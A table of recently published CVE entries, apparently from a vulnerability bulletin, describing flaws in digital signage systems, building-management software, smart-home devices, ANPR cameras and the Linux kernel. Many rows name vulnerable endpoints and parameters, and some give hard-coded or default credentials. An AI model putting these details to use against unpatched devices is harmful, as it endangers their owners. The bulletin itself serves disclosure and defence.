| SpinetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains an unauthenticated information disclosure vulnerability in the database backup directory. Attackers can access the /content/files/backups/ endpoint to download sensitive backup files containing user credentials and system information. | 2025-12-10 | not yet calculated | CVE-2020-36887 | ExploitDB-48845 Official Product Homepage Vendor Security Advisory for ZSL-2020-5593 VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Unauthenticated Database Backup Disclosure |
| SpenetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains a username enumeration vulnerability in its login script that allows attackers to identify valid user accounts. Attackers can send crafted login requests with different usernames to distinguish between existing and non-existing accounts by analyzing the server's error responses. | 2025-12-10 | not yet calculated | CVE-2020-36888 | ExploitDB-48847 Official Product Homepage Vendor Security Advisory for ZSL-2020-5591 VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration via Login Script |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains an unauthenticated privilege escalation vulnerability in the updateUser object that allows attackers to modify user roles. Attackers can exploit the /messagebroker/amf endpoint to elevate privileges and take over user accounts by manipulating role settings without authentication. | 2025-12-10 | not yet calculated | CVE-2020-36892 | ExploitDB-48774 Vulnerability Advisory Reference VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Unauthenticated Privilege Escalation |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains a directory traversal vulnerability that allows unauthenticated remote attackers to access files outside the server's root directory. Attackers can exploit the 'oldfile' GET parameter to view sensitive configuration files like web.xml and system files such as win.ini. | 2025-12-10 | not yet calculated | CVE-2020-36893 | ExploitDB-48766 EIBIZ Co.,Ltd. Product Web Page Zero Science Advisory ID ZSL-2020-5585 VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Directory Traversal Vulnerability |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to create admin users through AMF-encoded object manipulation. Attackers can send crafted serialized objects to the /messagebroker/amf endpoint to create administrative users without authentication, bypassing security controls. | 2025-12-10 | not yet calculated | CVE-2020-36894 | ExploitDB-48763 Vulnerability Advisory Reference VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Unauthenticated User Creation Vulnerability |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | EIBIZ i-Media Server Digital Signage 3.8.0 contains an unauthenticated configuration disclosure vulnerability that allows remote attackers to access sensitive configuration files via direct object reference. Attackers can retrieve the SiteConfig.properties file through an HTTP GET request, exposing administrative credentials, database connection details, and system configuration information. | 2025-12-10 | not yet calculated | CVE-2020-36895 | ExploitDB-48764 EIBIZ Co.,Ltd. Product Homepage Zero Security Advisory ZSL-2020-5583 VulnCheck Advisory: EIBIZ i-Media Server Digital Signage 3.8.0 Unauthenticated Configuration Disclosure |
| Shenzhen Xingmeng Qihang Media Co., Ltd.Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains a cleartext credentials vulnerability that allows unauthenticated attackers to access administrative login information through an unprotected XML file. Attackers can retrieve hardcoded admin credentials by requesting the '/xml/User/User.xml' file, enabling direct authentication bypass. | 2025-12-10 | not yet calculated | CVE-2020-36896 | ExploitDB-48748 Official Product Homepage Vendor Security Advisory for ZSL-2020-5579 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Cleartext Credentials Disclosure |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated remote code execution vulnerability in the QH.aspx file that allows attackers to upload malicious ASPX scripts. Attackers can exploit the file upload functionality by using the 'remotePath' and 'fileToUpload' parameters to write and execute arbitrary system commands on the server. | 2025-12-10 | not yet calculated | CVE-2020-36897 | ExploitDB-48751 Official Product Homepage Vendor Security Advisory for ZSL-2020-5582 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Remote Code Execution |
| Shenzhen Xingmeng Qihang Media Co., Ltd.Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated file deletion vulnerability in the QH.aspx endpoint that allows remote attackers to delete files without authentication. Attackers can exploit the 'data' parameter by sending a POST request with file paths to delete arbitrary files with web server permissions using directory traversal sequences. | 2025-12-10 | not yet calculated | CVE-2020-36898 | ExploitDB-48749 Official Product Homepage Vendor Security Advisory for ZSL-2020-5580 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive files through unverified 'filename' and 'path' parameters. Attackers can exploit the QH.aspx endpoint to read arbitrary files and directory contents without authentication by manipulating download and getAll actions. | 2025-12-10 | not yet calculated | CVE-2020-36899 | ExploitDB-48750 Official Product Homepage Vendor Security Advisory for ZSL-2020-5581 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Arbitrary File Disclosure |
| All-Dynamics Software GmbH--Digital Signage System | All-Dynamics Digital Signage System 2.0.2 contains a cross-site request forgery vulnerability that allows attackers to create administrative users without proper request validation. Attackers can craft a malicious web page that automatically submits forms to create a new user with global administrative privileges when a logged-in user visits the page. | 2025-12-10 | not yet calculated | CVE-2020-36900 | ExploitDB-48736 Zero Science Advisory ID ZSL-2020-5576 All-Dynamics Software GmbH Homepage VulnCheck Advisory: All-Dynamics Digital Signage System 2.0.2 Cross-Site Request Forgery via User Management |
| UBICOD Co., Ltd. | MEDIVISION INC.--UBICOD Medivision Digital Signage | UBICOD Medivision Digital Signage 1.5.1 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without proper request validation. Attackers can craft a malicious web page that submits a form to the /query/user/itSet endpoint to add a new admin user with elevated privileges. | 2025-12-10 | not yet calculated | CVE-2020-36901 | ExploitDB-48694 UBICOD Medivision Digital Signage Product Homepage Zero Science Advisory for ZSL-2020-5574 VulnCheck Advisory: UBICOD Medivision Digital Signage 1.5.1 Cross-Site Request Forgery via User Management |
| UBICOD Co., Ltd. | MEDIVISION INC.--UBICOD Medivision Digital Signage | UBICOD Medivision Digital Signage 1.5.1 contains an authorization bypass vulnerability that allows normal users to escalate privileges by manipulating the 'ft[grp]' parameter. Attackers can send a GET request to /html/user with 'ft[grp]' set to integer value '3' to gain super admin rights without authentication. | 2025-12-10 | not yet calculated | CVE-2020-36902 | ExploitDB-48684 UBICOD Co., Ltd. | MEDIVISION INC. Zero Security Advisory ZSL-2020-5575 VulnCheck Advisory: UBICOD Medivision Digital Signage 1.5.1 Authorization Bypass via User Privileges |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 allows an attacker to escalate privileges from a read user to an admin user by manipulating permissions and exploiting a vulnerability in the update_user_permissions.php script. Attackers can submit a malicious HTTP POST request to PHP scripts in '/plugins/useradmin/' directory. | 2025-12-09 | not yet calculated | CVE-2021-47701 | ExploitDB-50669 Zero Science Lab Disclosure (ZSL-2022-5693) VulnCheck Advisory: OpenBMCS User Management Privilege Escalation |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains a CSRF vulnerability that allows attackers to perform actions with administrative privileges by exploiting the sendFeedback.php endpoint. Attackers can submit malicious requests to trigger unintended actions, such as sending emails or modifying system settings. | 2025-12-09 | not yet calculated | CVE-2021-47702 | ExploitDB-50667 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5691) VulnCheck Advisory: OpenBMCS Cross Site Request Forgery (CSRF) via sendFeedback.php |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the 'ip' parameter to force the application to make an HTTP request to an arbitrary destination host. | 2025-12-09 | not yet calculated | CVE-2021-47703 | ExploitDB-50670 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5694) VulnCheck Advisory: OpenBMCS Server Side Request Forgery (SSRF) via /php/query.php |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting arbitrary SQL code. Attackers can send GET requests to /debug/obix_test.php with malicious 'id' values to extract database information. | 2025-12-09 | not yet calculated | CVE-2021-47704 | ExploitDB-50668 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5692) VulnCheck Advisory: OpenBMCS SQL Injection via obix_test.php |
| COMMAX Co., Ltd.--COMMAX UMS Client ActiveX Control | COMMAX UMS Client ActiveX Control 1.7.0.2 contains a heap-based buffer overflow vulnerability that allows attackers to execute arbitrary code by providing excessively long string arrays through multiple functions. Attackers can exploit improper boundary validation in CNC_Ctrl.dll to cause heap corruption and potentially gain system-level access. | 2025-12-09 | not yet calculated | CVE-2021-47705 | ExploitDB-50232 Zero Science Lab Disclosure (ZSL-2021-5664) Reference VulnCheck Advisory: CNC_Ctrl DllUnregisterServer Access Violation |
| COMMAX Co., Ltd.--COMMAX Biometric Access Control System | COMMAX Biometric Access Control System 1.0.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to access sensitive information and circumvent physical controls in smart homes and buildings by exploiting cookie poisoning. Attackers can forge cookies to bypass authentication and disclose sensitive information. | 2025-12-09 | not yet calculated | CVE-2021-47706 | ExploitDB-50206 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5661) COMMAX Biometric Access Control System 1.0.0 Product Page VulnCheck Advisory: COMMAX Biometric Access Control System Authentication Bypass |
| COMMAX Co., Ltd.--COMMAX CVD-Axx DVR | COMMAX CVD-Axx DVR 5.1.4 contains weak default administrative credentials that allow remote password attacks and disclose RTSP stream. Attackers can exploit this by sending a POST request with the 'passkey' parameter set to '1234', allowing them to access the web control panel. | 2025-12-09 | not yet calculated | CVE-2021-47707 | ExploitDB-50210 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5667) VulnCheck Advisory: COMMAX CVD-Axx DVR Weak Default Credentials Stream Disclosure |
| COMMAX Co., Ltd.--Smart Home IoT Control System | COMMAX Smart Home System CDP-1020n contains an SQL injection vulnerability that allows attackers to bypass authentication by injecting arbitrary SQL code through the 'id' parameter in 'loginstart.asp'. Attackers can exploit this by sending a POST request with malicious 'id' values to manipulate database queries and gain unauthorized access. | 2025-12-09 | not yet calculated | CVE-2021-47708 | ExploitDB-50207 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5662) Zero Science GitHub Repository VulnCheck Advisory: COMMAX Smart Home IoT Control System SQL Injection Authentication Bypass |
| COMMAX Co., Ltd.--Smart Home Ruvie CCTV Bridge DVR Service | COMMAX Smart Home System allows an unauthenticated attacker to change configuration and cause denial-of-service through the setconf endpoint. Attackers can trigger a denial-of-service scenario by sending a malformed request to the setconf endpoint. | 2025-12-09 | not yet calculated | CVE-2021-47709 | ExploitDB-50209 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5666) VulnCheck Advisory: COMMAX Smart Home Ruvie CCTV Bridge DVR Service Config Write / DoS |
| COMMAX Co., Ltd.--Smart Home Ruvie CCTV Bridge DVR Service | COMMAX Smart Home System is a smart IoT home solution that allows an unauthenticated attacker to disclose RTSP credentials in plain-text by exploiting the /overview.asp endpoint. Attackers can access sensitive information, including login credentials and DVR settings, by submitting a GET request to this endpoint. | 2025-12-09 | not yet calculated | CVE-2021-47710 | ExploitDB-50208 COMMAX Homepage Zero Science Lab Disclosure (ZSL-2021-5665) VulnCheck Advisory: COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure |
| IntelliChoice--IntelliChoice eFORCE Software Suite | IntelliChoice eFORCE Software Suite 2.5.9 contains a username enumeration vulnerability that allows attackers to enumerate valid users by exploiting the 'ctl00$MainContent$UserName' POST parameter. Attackers can send requests with valid usernames to retrieve user information. | 2025-12-09 | not yet calculated | CVE-2021-47717 | ExploitDB-50164 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5658) VulnCheck Advisory: IntelliChoice eFORCE Software Suite Username Enumeration |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive files by exploiting directory listing functionality. Attackers can browse directories like /debug/ and /php/ to discover configuration files, database credentials, and system information. | 2025-12-09 | not yet calculated | CVE-2021-47718 | ExploitDB-50671 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5695) VulnCheck Advisory: OpenBMCS Directory Listing Information Disclosure |
| COMMAX Co., Ltd.--COMMAX WebViewer ActiveX Control | COMMAX WebViewer ActiveX Control 2.1.4.5 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by providing excessively long string arrays through multiple functions. Attackers can exploit boundary errors in Commax_WebViewer.ocx to cause buffer overflow conditions and potentially gain code execution. | 2025-12-09 | not yet calculated | CVE-2021-47719 | ExploitDB-50231 Zero Science Lab Disclosure (ZSL-2021-5663) Reference VulnCheck Advisory: CNC_Ctrl DllUnregisterServer f5501 Access Violation |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. Attackers can visit malicious web sites to trigger the forge request, allowing them to create new admin users. | 2025-12-09 | not yet calculated | CVE-2021-47723 | ExploitDB-49482 STVS SA Homepage Zero Science Lab Disclosure (ZSL-2021-5625) VulnCheck Advisory: STVS ProVision Cross-Site Request Forgery (Add Admin) |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd. | 2025-12-09 | not yet calculated | CVE-2021-47724 | ExploitDB-49481 Zero Science Lab Disclosure (ZSL-2021-5623) Reference VulnCheck Advisory: STVS ProVision Authenticated File Disclosure via archive.rb |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains an unauthenticated vulnerability that allows remote attackers to access live video streams without authentication. Attackers can directly connect to RTP/RTSP or M-JPEG streams by requesting specific endpoints like p1.mjpg or p1.264 to view camera footage. | 2025-12-09 | not yet calculated | CVE-2021-47727 | ExploitDB-49459 Selea s.r.l. Product Homepage Zero Science Lab Disclosure (ZSL-2021-5619) Mbed TLS GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Unauthenticated Stream Disclosure |
| Selea--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques. | 2025-12-09 | not yet calculated | CVE-2021-47728 | ExploitDB-49460 Selea Homepage Zero Science Lab Disclosure (ZSL-2021-5620) Zero Science GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Remote Code Execution via Utils |
| selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a stored cross-site scripting vulnerability in the 'files_list' parameter that allows attackers to inject malicious HTML and script code. Attackers can send a POST request to /cgi-bin/get_file.php with crafted payload to execute arbitrary scripts in victim's browser session. | 2025-12-09 | not yet calculated | CVE-2021-47729 | ExploitDB-49454 Selea s.r.l. Product Homepage Zero Science Lab Disclosure (ZSL-2021-5614) Selea Targa IP OCR-ANPR Camera Product Page VulnCheck Advisory: Selea Targa IP Camera Stored Cross-Site Scripting via Files List |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a cross-site request forgery vulnerability that allows attackers to create administrative users without authentication. Attackers can craft a malicious web page that submits a form to add a new admin user with full system privileges when a logged-in user visits the page. | 2025-12-09 | not yet calculated | CVE-2021-47730 | ExploitDB-49458 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5618) GitHub Repository of Zero Science VulnCheck Advisory: Selea Targa IP Camera Cross-Site Request Forgery via Admin Creation |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a hard-coded developer password vulnerability that allows unauthorized configuration access through an undocumented page. Attackers can exploit the hidden endpoint by using the hard-coded password 'Selea781830' to enable configuration upload and overwrite device settings. | 2025-12-09 | not yet calculated | CVE-2021-47731 | ExploitDB-49455 Selea s.r.l. Product Web Page Zero Science Lab Disclosure (ZSL-2021-5615) Zero Science GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Developer Backdoor Configuration Overwrite |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid0, raid10: Don't set discard sectors for request queue It should use disk_stack_limits to get a proper max_discard_sectors rather than setting a value by stack drivers. And there is a bug. If all member disks are rotational devices, raid0/raid10 set max_discard_sectors. So the member devices are not ssd/nvme, but raid0/raid10 export the wrong value. It reports warning messages in function __blkdev_issue_discard when mkfs.xfs like this: [ 4616.022599] ------------[ cut here ]------------ [ 4616.027779] WARNING: CPU: 4 PID: 99634 at block/blk-lib.c:50 __blkdev_issue_discard+0x16a/0x1a0 [ 4616.140663] RIP: 0010:__blkdev_issue_discard+0x16a/0x1a0 [ 4616.146601] Code: 24 4c 89 20 31 c0 e9 fe fe ff ff c1 e8 09 8d 48 ff 4c 89 f0 4c 09 e8 48 85 c1 0f 84 55 ff ff ff b8 ea ff ff ff e9 df fe ff ff <0f> 0b 48 8d 74 24 08 e8 ea d6 00 00 48 c7 c6 20 1e 89 ab 48 c7 c7 [ 4616.167567] RSP: 0018:ffffaab88cbffca8 EFLAGS: 00010246 [ 4616.173406] RAX: ffff9ba1f9e44678 RBX: 0000000000000000 RCX: ffff9ba1c9792080 [ 4616.181376] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff9ba1c9792080 [ 4616.189345] RBP: 0000000000000cc0 R08: ffffaab88cbffd10 R09: 0000000000000000 [ 4616.197317] R10: 0000000000000012 R11: 0000000000000000 R12: 0000000000000000 [ 4616.205288] R13: 0000000000400000 R14: 0000000000000cc0 R15: ffff9ba1c9792080 [ 4616.213259] FS: 00007f9a5534e980(0000) GS:ffff9ba1b7c80000(0000) knlGS:0000000000000000 [ 4616.222298] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4616.228719] CR2: 000055a390a4c518 CR3: 0000000123e40006 CR4: 00000000001706e0 [ 4616.236689] Call Trace: [ 4616.239428] blkdev_issue_discard+0x52/0xb0 [ 4616.244108] blkdev_common_ioctl+0x43c/0xa00 [ 4616.248883] blkdev_ioctl+0x116/0x280 [ 4616.252977] __x64_sys_ioctl+0x8a/0xc0 [ 4616.257163] do_syscall_64+0x5c/0x90 [ 4616.261164] ? handle_mm_fault+0xc5/0x2a0 [ 4616.265652] ? do_user_addr_fault+0x1d8/0x690 [ 4616.270527] ? do_syscall_64+0x69/0x90 [ 4616.274717] ? exc_page_fault+0x62/0x150 [ 4616.279097] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 4616.284748] RIP: 0033:0x7f9a55398c6b | 2025-12-08 | not yet calculated | CVE-2022-50583 | https://git.kernel.org/stable/c/e80bef070699d2e791badefccb1ddabd6998d468 https://git.kernel.org/stable/c/27e5d61a8e6919b5c0c6f473703ffea2acba862a https://git.kernel.org/stable/c/8e1a2279ca2b0485cc379a153d02a9793f74a48f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: pci_endpoint_test: Fix pci_endpoint_test_{copy,write,read}() panic The dma_map_single() doesn't permit zero length mapping. It causes a follow panic. A panic was reported on arm64: [ 60.137988] ------------[ cut here ]------------ [ 60.142630] kernel BUG at kernel/dma/swiotlb.c:624! [ 60.147508] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP [ 60.152992] Modules linked in: dw_hdmi_cec crct10dif_ce simple_bridge rcar_fdp1 vsp1 rcar_vin videobuf2_vmalloc rcar_csi2 v4l 2_mem2mem videobuf2_dma_contig videobuf2_memops pci_endpoint_test videobuf2_v4l2 videobuf2_common rcar_fcp v4l2_fwnode v4l2_asyn c videodev mc gpio_bd9571mwv max9611 pwm_rcar ccree at24 authenc libdes phy_rcar_gen3_usb3 usb_dmac display_connector pwm_bl [ 60.186252] CPU: 0 PID: 508 Comm: pcitest Not tainted 6.0.0-rc1rpci-dev+ #237 [ 60.193387] Hardware name: Renesas Salvator-X 2nd version board based on r8a77951 (DT) [ 60.201302] pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 60.208263] pc : swiotlb_tbl_map_single+0x2c0/0x590 [ 60.213149] lr : swiotlb_map+0x88/0x1f0 [ 60.216982] sp : ffff80000a883bc0 [ 60.220292] x29: ffff80000a883bc0 x28: 0000000000000000 x27: 0000000000000000 [ 60.227430] x26: 0000000000000000 x25: ffff0004c0da20d0 x24: ffff80000a1f77c0 [ 60.234567] x23: 0000000000000002 x22: 0001000040000010 x21: 000000007a000000 [ 60.241703] x20: 0000000000200000 x19: 0000000000000000 x18: 0000000000000000 [ 60.248840] x17: 0000000000000000 x16: 0000000000000000 x15: ffff0006ff7b9180 [ 60.255977] x14: ffff0006ff7b9180 x13: 0000000000000000 x12: 0000000000000000 [ 60.263113] x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000 [ 60.270249] x8 : 0001000000000010 x7 : ffff0004c6754b20 x6 : 0000000000000000 [ 60.277385] x5 : ffff0004c0da2090 x4 : 0000000000000000 x3 : 0000000000000001 [ 60.284521] x2 : 0000000040000000 x1 : 0000000000000000 x0 : 0000000040000010 [ 60.291658] Call trace: [ 60.294100] swiotlb_tbl_map_single+0x2c0/0x590 [ 60.298629] swiotlb_map+0x88/0x1f0 [ 60.302115] dma_map_page_attrs+0x188/0x230 [ 60.306299] pci_endpoint_test_ioctl+0x5e4/0xd90 [pci_endpoint_test] [ 60.312660] __arm64_sys_ioctl+0xa8/0xf0 [ 60.316583] invoke_syscall+0x44/0x108 [ 60.320334] el0_svc_common.constprop.0+0xcc/0xf0 [ 60.325038] do_el0_svc+0x2c/0xb8 [ 60.328351] el0_svc+0x2c/0x88 [ 60.331406] el0t_64_sync_handler+0xb8/0xc0 [ 60.335587] el0t_64_sync+0x18c/0x190 [ 60.339251] Code: 52800013 d2e00414 35fff45c d503201f (d4210000) [ 60.345344] ---[ end trace 0000000000000000 ]--- To fix it, this patch adds a checking the payload length if it is zero. | 2025-12-08 | not yet calculated | CVE-2022-50614 | https://git.kernel.org/stable/c/0df206bdc6204b758585bbe159a55e23e7917b13 https://git.kernel.org/stable/c/e5ebcbb4f967af2083d409271aaf7c7d8351603f https://git.kernel.org/stable/c/279116cb0bc5cd8af65d6a00ffe074bd09842f88 https://git.kernel.org/stable/c/6c01739c2aba19553beb20491b05515af9246f0f https://git.kernel.org/stable/c/8e30538eca016de8e252bef174beadecd64239f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Fix reference count leak in snr_uncore_mmio_map() pci_get_device() will increase the reference count for the returned pci_dev, so snr_uncore_get_mc_dev() will return a pci_dev with its reference count increased. We need to call pci_dev_put() to decrease the reference count. Let's add the missing pci_dev_put(). | 2025-12-08 | not yet calculated | CVE-2022-50615 | https://git.kernel.org/stable/c/d2afced51108813256d8072c6e464b0c9f0bb890 https://git.kernel.org/stable/c/433bd587dca5c3f7157fef2fe571290cd392cbf6 https://git.kernel.org/stable/c/a67146437b6428069b71a7e5e740a2a8e1c40ac9 https://git.kernel.org/stable/c/dc7f07bc1ebb56a23fd1c4f664db5cbeb8900800 https://git.kernel.org/stable/c/8ebd16c11c346751b3944d708e6c181ed4746c39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: Use different devices for resource allocation and DT lookup Following by the below discussion, there's the potential UAF issue between regulator and mfd. https://lore.kernel.org/all/20221128143601.1698148-1-yangyingliang@huawei.com/ From the analysis of Yingliang CPU A |CPU B mt6370_probe() | devm_mfd_add_devices() | |mt6370_regulator_probe() | regulator_register() | //allocate init_data and add it to devres | regulator_of_get_init_data() i2c_unregister_device() | device_del() | devres_release_all() | // init_data is freed | release_nodes() | | // using init_data causes UAF | regulator_register() It's common to use mfd core to create child device for the regulator. In order to do the DT lookup for init data, the child that registered the regulator would pass its parent as the parameter. And this causes init data resource allocated to its parent, not itself. The issue happen when parent device is going to release and regulator core is still doing some operation of init data constraint for the regulator of child device. To fix it, this patch expand 'regulator_register' API to use the different devices for init data allocation and DT lookup. | 2025-12-08 | not yet calculated | CVE-2022-50616 | https://git.kernel.org/stable/c/cb29811d989bcb7ea81ca111c4b13878b344e086 https://git.kernel.org/stable/c/b0f25ca1ff9be7abd1679ae7e59a8f25dbffe67a https://git.kernel.org/stable/c/8f3cbcd6b440032ebc7f7d48a1689dcc70a4eb98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/powerplay/psm: Fix memory leak in power state init Commit 902bc65de0b3 ("drm/amdgpu/powerplay/psm: return an error in power state init") made the power state init function return early in case of failure to get an entry from the powerplay table, but it missed to clean up the allocated memory for the current power state before returning. | 2025-12-08 | not yet calculated | CVE-2022-50617 | https://git.kernel.org/stable/c/1caed03305b560bafea8eaa57f1847791658b3ff https://git.kernel.org/stable/c/7cb8932644438bee992dc898a36ffe155fdc1bfa https://git.kernel.org/stable/c/1c65f8f98148709e08bd6157a807c443ba91f0ac https://git.kernel.org/stable/c/8f8033d5663b18e6efb33feb61f2287a04605ab5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: meson-gx: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, it will lead two issues: 1. The memory that allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete device, but it's not added yet, it will lead a kernel crash because of null-ptr-deref in device_del(). Fix this by checking the return value and goto error path which will call mmc_free_host(). | 2025-12-08 | not yet calculated | CVE-2022-50618 | https://git.kernel.org/stable/c/f5506e0bbb25102bd8ef2e1a3b483a0b934e454e https://git.kernel.org/stable/c/9e11c6bb745be4e9b325cf96031b4ea34801342d https://git.kernel.org/stable/c/64b2c441171febf075bd9632aca579afda8ab9fb https://git.kernel.org/stable/c/e0cfe7aa41f3965f5224affd88afd48c60f6ad1f https://git.kernel.org/stable/c/42343e3c6195e934b9cb4c08b7ff84a3778d77f9 https://git.kernel.org/stable/c/f5ce76aeddf01ca8f2a80fc37119388d59db7c10 https://git.kernel.org/stable/c/90935f16f2650ab7416fa2ffbe5c28cb39cf3f1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix memory leak in kfd_mem_dmamap_userptr() If the number of pages from the userptr BO differs from the SG BO then the allocated memory for the SG table doesn't get freed before returning -EINVAL, which may lead to a memory leak in some error paths. Fix this by checking the number of pages before allocating memory for the SG table. | 2025-12-08 | not yet calculated | CVE-2022-50619 | https://git.kernel.org/stable/c/304a10161696d86300ceab1cbe72b2d74b8cdd94 https://git.kernel.org/stable/c/c6dc4c9ba093829ebe1450d5fb101da6fb7a2a58 https://git.kernel.org/stable/c/90bfee142af0f0e9d3bec80e7acd5f49b230acf7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to invalidate dcc->f2fs_issue_discard in error path Syzbot reports a NULL pointer dereference issue as below: __refcount_add include/linux/refcount.h:193 [inline] __refcount_inc include/linux/refcount.h:250 [inline] refcount_inc include/linux/refcount.h:267 [inline] get_task_struct include/linux/sched/task.h:110 [inline] kthread_stop+0x34/0x1c0 kernel/kthread.c:703 f2fs_stop_discard_thread+0x3c/0x5c fs/f2fs/segment.c:1638 kill_f2fs_super+0x5c/0x194 fs/f2fs/super.c:4522 deactivate_locked_super+0x70/0xe8 fs/super.c:332 deactivate_super+0xd0/0xd4 fs/super.c:363 cleanup_mnt+0x1f8/0x234 fs/namespace.c:1186 __cleanup_mnt+0x20/0x30 fs/namespace.c:1193 task_work_run+0xc4/0x14c kernel/task_work.c:177 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0x26c/0xbe0 kernel/exit.c:795 do_group_exit+0x60/0xe8 kernel/exit.c:925 __do_sys_exit_group kernel/exit.c:936 [inline] __se_sys_exit_group kernel/exit.c:934 [inline] __wake_up_parent+0x0/0x40 kernel/exit.c:934 __invoke_syscall arch/arm64/kernel/syscall.c:38 [inline] invoke_syscall arch/arm64/kernel/syscall.c:52 [inline] el0_svc_common+0x138/0x220 arch/arm64/kernel/syscall.c:142 do_el0_svc+0x48/0x164 arch/arm64/kernel/syscall.c:206 el0_svc+0x58/0x150 arch/arm64/kernel/entry-common.c:636 el0t_64_sync_handler+0x84/0xf0 arch/arm64/kernel/entry-common.c:654 el0t_64_sync+0x18c/0x190 arch/arm64/kernel/entry.S:581 The root cause of this issue is in error path of f2fs_start_discard_thread(), it missed to invalidate dcc->f2fs_issue_discard, later kthread_stop() may access invalid pointer. | 2025-12-08 | not yet calculated | CVE-2022-50620 | https://git.kernel.org/stable/c/865bb7b5a7deeb0e5afbd82381d52d38825dc64d https://git.kernel.org/stable/c/a3e517a6ba695d683ee63615e1ea6e6b4c7d2732 https://git.kernel.org/stable/c/ae6c960a82c52c3bda5adc82d90643d6c12d308e https://git.kernel.org/stable/c/91586ce0d39a05f88795aa8814fb99b1387236b3 |
